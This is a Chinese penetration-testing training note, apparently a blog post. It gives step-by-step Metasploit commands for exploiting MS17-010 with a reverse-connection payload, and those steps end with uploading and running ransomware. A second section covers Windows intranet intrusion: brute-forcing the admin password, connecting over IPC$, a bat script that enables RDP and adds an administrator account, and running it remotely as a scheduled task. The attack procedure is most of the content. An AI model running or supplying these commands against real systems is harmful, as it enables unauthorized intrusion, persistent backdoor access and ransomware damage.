网络安全实训Day16

网络空间安全实训-渗透测试

漏洞扫描

  • 定义

    • 扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞
  • 漏扫工具

    • AWVS

    • APPScan

    • MSF

复制代码
### 使用MSF扫描漏洞并利用

* 1.搜索需要的攻击模块

  * search ms17-010

* 2.使用攻击模块

  * use 模块名称

* 3.设置扫描范围

  * set rhosts 192.168.12.0/24

* 4.设置扫描线程

  * set thread 50

* 5.开始扫描

  * run

* 6.更换攻击模块为漏洞利用

* 7.查看可用攻击载荷

  * show payloads

* 8.设置攻击载荷

  * set payload 攻击载荷名称

* 9.设置被攻击主机IP地址

  * set rhost IP地址

* 10.设置反向连接的控制机IP地址

  * set lhost IP地址

* 11.开始攻击

  * run

* 12.上传病毒

  * upload 本地文件路径 远程主机路径

* 13.执行勒索病毒

  * execute -f 勒索病毒路径

Windows内网渗透

复制代码
#### 1.扫描对方操作系统和开放的端口

* 确定对方是Windows系统开启了445接口
复制代码
#### 2.针对该端口服务暴力破解Windows管理员账号密码
复制代码
#### 3.与对方建立空连接

* net use \\\\对方ip地址\\ipc$

* 需要输入对方的管理员账号密码
复制代码
#### 4.制作开启RDP和创建管理员账户的脚本bat

* REG ADD "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

* net user 用户名 密码 /add

* net local group administrator 用户名 /add
复制代码
#### 5.访问对方C盘默认共享,将bat复制到对方C盘

* 在文件资源管理器地址栏中输入 \\\\对方IP地址\\c$
复制代码
#### 6.查看对方的系统时间

* net time \\\\对方IP地址
复制代码
#### 7.给对方创建任务计划,定时执行BAT程序,开启RDP

* at \\\\对方ip地址 时间 执行的文件路径
复制代码
#### 8.使用先前创建的管理员账号登陆RDP
相关推荐
ReedFoley7 小时前
【笔记】动手学Ollama 第七章 应用案例1 搭建本地AI Copilot编程助手
人工智能·笔记·copilot
长安即是故里8 小时前
Maxwell学习笔记
笔记·学习
witkey_ak98969 小时前
网络安全转型书籍清单
安全·web安全
咸甜适中10 小时前
rust语言 (1.88) egui (0.32.1) 学习笔记(逐行注释)(十四)垂直滚动条
笔记·学习·rust·egui
努力敲代码的小盆友10 小时前
[自用笔记]上传本地项目至github
笔记·github
qingtian!10 小时前
vulnhub-billu_b0x靶机渗透
网络安全·渗透测试
jieyu111911 小时前
内网后渗透攻击--域控制器安全(1)
安全·web安全·内网渗透·域控制器安全
It_张11 小时前
Building Systems with the ChatGPT API 使用 ChatGPT API 搭建系统(第五章学习笔记及总结)
笔记·学习·chatgpt
The_Second_Coming12 小时前
Linux 学习笔记 - 集群管理篇
linux·笔记·学习
浩浩测试一下13 小时前
06高级语言逻辑结构到汇编语言之逻辑结构转换 for (...; ...; ...)
汇编·数据结构·算法·安全·web安全·网络安全·安全架构